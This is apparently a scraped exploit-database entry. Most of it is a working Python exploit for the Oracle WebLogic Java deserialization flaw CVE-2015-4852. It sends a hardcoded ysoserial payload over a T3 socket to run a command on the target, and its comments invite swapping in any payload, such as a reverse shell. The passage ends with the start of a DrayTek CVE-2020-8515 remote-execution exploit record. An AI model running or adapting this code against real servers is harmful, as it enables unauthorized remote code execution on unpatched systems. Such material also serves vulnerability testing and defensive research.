Author: FoxGloveSecurity \n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html] \n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0] \n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr] \n# CVE : [CVE-2015-4852] \n \n''' \nThis exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send \nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful. \nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \nthis script will do it for you on the fly. \n''' \n \n#!/usr/bin/env python \nimport socket \nimport sys \nimport struct \nfrom binascii import unhexlify \n \nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\" \nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\" \n \nif len(sys.argv) < 2: \nprint \"\\n[+]Please provide target IP and Port...\" \nprint \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\" \nsys.exit() \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver_address = (sys.argv[1], int(sys.argv[2])) \nprint '[+]Connecting to %s port %s' % server_address \nsock.connect(server_address) \n \n#Send headers \nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n' \nprint '[+]Sending\\n\"%s\"' % headers \nsock.sendall(headers) \n \ndata = sock.recv(1024) \nprint >>sys.stderr, '\\n[+]Received \"%s\"' % data \n \n \n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload. \n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length \nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00' \n \n \n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out \n#len(payload) is xxxx bytes \n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target. \n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload. \n \n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :) \nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\" \n \n \nchunk3 = '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78' \n \ntotallength = len(chunk1) + len(chunk2) + len(chunk3) \nprint \"[+]TOTAL payload length: \", totallength \n \n#Update the TOTAL payload length in Chunk1 \nlen_hex = hex(totallength) \nprint \"[+]Payload length in HEX: \", len_hex \nlen_hex = len_hex.replace('0x', '0') \nprint \"[+]Payload length in HEX: \" , len_hex \n \ns1 = len_hex[:2] \ns2 = len_hex[2:4] \nlen_hex = unhexlify(s1 + s2) \n \nprint \"[+]Payload length in HEX now: \", len_hex \n \n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2) \nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\" \n \nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00' \n \n#print \"[+]Updated 'chunk1' : \\n\", chunk1 \n \n#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1' \npayload = chunk1 + chunk2 + chunk3 \n \n#Adjust header for appropriate message length \npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:]) \nprint '[+]Sending payload...' \nsock.send(payload) \n \nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\" \nprint(\"\\n[+]Response to Request#: \\n\") \nresponse = sock.recv(15000) \nprint(response) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144405/oracleweblogic12-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-01T02:16:44", "description": "", "cvss3": {}, "published": "2020-03-31T00:00:00", "type": "packetstorm", "title": "DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-31T00:00:00", "id": "PACKETSTORM:156979", "href": "https://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html", "sourceData": "`package main \n \n \n/* \nCVE-2020-8515: DrayTek pre-auth remote root RCE \nMon Mar 30 2020 - 0xsha.io \nAffected: \nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, \nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, \nand 1.4.4_Beta \nYou should upgrade as soon as possible to 1.5.1 firmware or later \nThis issue has been fixed in Vigor3900/2960/300B v1.5.1. \nread more : \nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html 